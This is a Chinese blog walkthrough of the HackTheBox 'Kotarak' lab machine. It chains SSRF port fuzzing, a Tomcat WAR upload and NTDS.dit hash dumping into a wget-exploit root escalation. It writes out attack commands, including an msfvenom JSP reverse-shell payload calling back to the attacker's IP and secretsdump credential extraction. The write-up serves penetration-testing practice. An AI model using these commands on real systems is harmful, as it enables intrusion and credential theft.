No.116-HackTheBox-Linux-Kotarak-Walkthrough渗透学习

**

HackTheBox-Linux-Kotarak-Walkthrough

**

靶机地址：https://www.hackthebox.eu/home/machines/profile/101
靶机难度：中级（5.0/10）
靶机发布日期：2017年10月22日
靶机描述：
Kotarak focuses on many different attack vectors and requires quite a few steps for completion. It is a great learning experience as many of the topics are not covered by other machines on Hack The Box.

作者：大余
时间：2020-05-27

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.55…

Nmap扫描发现OpenSSH，Apache Tomca和Apache Web服务器都开放着…

访问8080web是不完整的页面返回…直接爆破发现了manager目录…但是这里访问后还是错误页面…去60000看看

60000是提供了私有的web服务器…

当访问了60000后在访问8080mannger后发现跳到了用户登陆界面框…需要获得账号密码…

这边使用gubuster和dirb爆破了60000web服务页面…
存在很多有价值的信息…例如rever-status、url.php等…

niko枚举发现该页面容易受到远程SSRF（服务器端请求伪造）的攻击…

SSRF

启动burp并将请求/url.php?path=1发送到burp分析，原理SSRF允许我们查看内部服务器信息，尝试查看目录文件时，回复的是继续努力…SSRF还能查看本地监听的端口…22是存在的…枚举看看

命令：wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php?path=localhost:FUZZ
这里利用Wfuzz枚举了本地开放的端口…888

通过URL打开localhost:888，其中包含一些指向不同文件的链接…

进入备份发现是空白的…

回来检查源代码发现了?doc=backup，复制继续到web_url查看…

查看后还是空白的，我查看源代码发现了有用的信息…获得了账号密码…

利用用户名密码登陆了8080web界面…跳转到了Tomcat默认页面
Tomcat管理器UI具有一个小功能，它允许将.war文件部署到服务器…利用文件上传提权…

命令：msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -f war> dayushell.war
这里利用MSF创建了.war的shell，上传成功提权…
这里发现数据通道差，需要stty调整下…

这里用户枚举发现存在Active Directory数据库文件.dit和.bin…下载到本地…

命令：impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL
Ntds.dit文件是一个数据库，用于存储Active Directory数据，包括有关用户对象，组和组成员身份的信息，它包括域中所有用户的密码哈希…
这是AD数据库文件…利用secretsdump来转储哈希值…
可以看到转储了所有用户对象组的哈希…

命令：awk -F: '{print $4}' hash
继续转储…

页面爆破或者john爆破都行，获得了atanas和adminis…密码…

这里直接su提权…成功获得user_flag信息…

上传LinEnum.sh枚举…

枚举发现可以看到根目录信息…
进来查看后发现了两个文件…flag.txt和app.log
app获得了很重要的信息：
1、IP 10.0.3.133每2分钟利用GET调用一个名为archive.tar.gz的文件…
2、IP 10.0.3.133机器上的wget版本是1.16，容易受到攻击…

本地搜索wget存在的漏洞…40064EXP可利用…

wget <1.18当提供有恶意URL发送到恶意或受感染的Web服务器时，可以被诱骗保存攻击者提供的任意远程文件，并通过写入.wgetrc在当前目录下以及其他目录下保存任意内容和文件名…
直接利用该EXP即可…

根据漏洞利用PoC所示，创建一个包含以下内容的.wgetrc文件，然后启用了FTP服务器…

利用EXP写入简单shell…

命令：authbind python exploit.py
这里需要利用authbind，因为靶机启用了authbind，authbind作用是root用户和授权用户只能绑定到1024以下的端口…
执行后，等待了5分钟左右…成功获得了反向外壳…获得了root_flag信息…

apache爆破+SSRF攻击+文件上传提权+靶机枚举+wget漏洞提权

由于我们已经成功得到root权限查看user和root.txt，因此完成这台中级的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。